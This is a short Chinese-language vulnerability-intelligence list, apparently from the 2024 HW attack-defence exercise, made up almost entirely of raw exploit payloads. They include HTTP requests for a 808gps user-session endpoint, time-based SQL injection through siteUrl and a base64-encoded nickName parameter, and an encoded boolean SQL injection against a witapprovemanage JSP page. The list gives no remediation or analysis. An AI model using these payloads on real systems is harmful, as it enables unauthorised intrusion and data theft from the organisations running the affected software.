HW2024验真漏洞情报 8.3

漏洞复现：payload：/user/register/init        

漏洞复现：payload：POST /808gps/LocationManagement/UserSessionAction_saveUserSession.action HTTP/1.1Host: User-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:103.0)Gecko/20100101Firefox/103.0Content-Type: application/x-www-form-urlencoded           userSession=42AA7A2BE767123A42E1530ACC920781&id=4

漏洞复现：payload：    POST /user/ajax.php?act=siteadd HTTP/1.1Host: Cache-Control: max-age=0sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 27               siteUrl=';select sleep(3)#'

漏洞复现：payload：GET /index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw== HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36

payload：POST /witapprovemanage/apprvaddNew.j%73p HTTP/1.1Host: Content-Type: application/x-www-form-urlencodedContent-Length: 35           flowid=1%27%2B%28SELECT+CHAR%2880%29%2BCHAR%28102%29%2BCHAR%2879%29%2BCHAR%2887%29+WHERE+2368%3D2368+AND+4817+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%284817%3D4817%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28113%29%29%29%29%2B%27